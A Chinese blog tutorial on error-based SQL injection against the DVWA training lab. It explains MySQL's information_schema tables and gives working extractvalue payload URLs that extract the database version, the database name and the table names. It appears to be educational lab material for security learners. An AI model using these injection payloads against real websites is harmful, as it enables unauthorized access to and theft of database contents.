Web安全之SQL注入漏洞学习(六)-报错注入实战

本文介绍了DVWA(Damn Vulnerable Web App)靶机的搭建过程,并详细讲解了SQL注入漏洞的检测与利用。通过注入'号获取数据库报错信息,展示了如何利用extractvalue和information_schema获取数据库版本、数据库名、表名等敏感信息。同时,提供了利用注入获取数据的payload示例,揭示了攻击者可能获取到的数据全貌。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DVWA靶机搭建

​ DVWA(Damn Vulnerable Web App)是一个基于PHP/MySql搭建的Web应用程序,旨在为安全专业人员测试自己的专业技能和工具提供合法的 环境,帮助Web开发者更好的理解Web应用安全防范的过程。

​ 搭建方法与第一遍文章搭建bWAPP环境相同!!默认用户名:admin 默认密码:password

基础知识

​ 在MySQL中,自带了 information_schema信息数据库。这个库的作用保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在INFORMATION_SCHEMA中,有数个只读表。

information_schema数据库表说明:

SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。

SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。

TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。

COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。

CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。

COLLATIONS表:提供了关于各字符集的对照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。

TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。

KEY_COLUMN_USAGE表:描述了具有约束的键列。

ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。

TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表。

选择漏洞

漏洞检测

使用最经典的'号进行检测,如果返回错误信息则说明存在注入漏洞

如下图所示,输入'号后点击提交后页面返回数据库的报错信息。

 构建playload验证是否能成功注入。

http://x.xx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,(select @@version)) -- &Submit=Submit#

注入后成功获取了数据库版本号。

漏洞利用

获取数据库名称过程

http://xx.xxx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,concat(0x7e,(select database()))) -- &Submit=Submit#

获取数据库表表名过程

information_schema:

首选尝试查询当前数据库中有哪些表,看看是否能够返回数据中所有表名

http://x.xxx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables ))) -- &Submit=Submit#

http://x.xxx.xxx.xxx:81/vulnerabilities/sqli/?id=' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables limit 1,1))) -- &Submit=Submit#

 从上述过程注入过程中我们可以通过information_schema数据库获取到数据库中所有的表信息,进而获取表中的所有数据,此时攻击者就相当于掌握的数据中所有的信息。

欢迎大家关注我的订阅号,会定期分享一些关于测试相关的文章,有问题也欢迎一起讨论学习!
在这里插入图片描述

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值